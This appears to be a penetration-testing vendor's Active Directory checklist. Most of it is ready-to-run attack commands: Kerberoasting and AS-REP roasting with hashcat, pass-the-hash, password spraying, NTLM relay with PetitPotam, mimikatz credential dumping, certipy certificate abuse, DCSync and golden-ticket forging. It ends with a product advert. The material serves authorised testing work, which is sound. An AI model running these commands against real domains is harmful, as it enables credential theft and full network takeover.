Vulnsy
Infrastructure28 items

Active Directory Security Checklist

A targeted penetration testing checklist for Microsoft Active Directory environments. Covers domain enumeration, Kerberos attacks, ACL abuse, Group Policy exploitation, lateral movement, and domain dominance techniques used by real-world threat actors.

MITRE ATT&CKNIST SP 800-115CIS BenchmarksPTES
Progress: 0 of 28 items
0%
Commands
bloodhound-python -d corp.local -u user -p Password1 -ns 10.0.0.1 -c All
SharpHound.exe -c All --zipfilename collection.zip
Evidence to capture

BloodHound graph screenshot showing the shortest path from a low-privilege user to Domain Admin, with each edge labelled.

Commands
net group "Domain Admins" /domain
crackmapexec ldap 10.0.0.1 -u user -p pass --groups
Commands
GetUserSPNs.py corp.local/user:Password1 -dc-ip 10.0.0.1
Commands
Get-GPO -All
Commands
Get-LAPSPasswords.ps1
crackmapexec ldap 10.0.0.1 -u user -p pass -M laps
Commands
Get-NetComputer -Unconstrained
findDelegation.py corp.local/user:Password1
Commands
GetUserSPNs.py corp.local/user:Password1 -dc-ip 10.0.0.1 -request
hashcat -m 13100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
Evidence to capture

output of GetUserSPNs.py with the captured TGS hash plus the hashcat result confirming the cracked plaintext password.

Commands
GetNPUsers.py corp.local/ -dc-ip 10.0.0.1 -usersfile users.txt -no-pass -format hashcat
hashcat -m 18200 -a 0 asrep.txt /usr/share/wordlists/rockyou.txt
Commands
crackmapexec smb 10.0.0.0/24 -u Administrator -H <ntlm_hash>
evil-winrm -i 10.0.0.5 -u Administrator -H <ntlm_hash>
Commands
kerbrute passwordspray --dc 10.0.0.1 -d corp.local users.txt "Spring2026!"
crackmapexec smb 10.0.0.1 -u users.txt -p "Spring2026!" --continue-on-success
Commands
ntlmrelayx.py -t http://adcs.corp.local/certsrv/certfnsh.asp -smb2support --adcs
PetitPotam.py <attacker_ip> <dc_ip>
Commands
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
Commands
certipy find -u user@corp.local -p Password1 -dc-ip 10.0.0.1 -vulnerable
certipy req -u user@corp.local -p Password1 -ca CORP-CA -template VulnerableTemplate -upn administrator@corp.local
Evidence to capture

certipy find output flagging the vulnerable template (ESC ID) plus the resulting issued certificate authenticating as Domain Admin.

Commands
secretsdump.py -just-dc corp.local/Administrator@10.0.0.1
Evidence to capture

truncated secretsdump output showing DCSync replication succeeded and a sample of extracted NTLM hashes (with KRBTGT hash redacted as appropriate).

Commands
mimikatz "kerberos::golden /user:Administrator /domain:corp.local /sid:<SID> /krbtgt:<HASH> /ptt"

Report Vulnerabilities Faster with Vulnsy

Stop rewriting the same findings. Use Vulnsy's reusable templates, collaborative workflows, and professional report generation to deliver pentest reports 10x faster.

Start Free Trial